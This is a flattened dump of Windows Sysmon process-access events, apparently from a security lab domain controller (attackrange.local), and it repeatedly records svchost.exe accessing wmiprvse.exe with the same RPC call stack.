13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
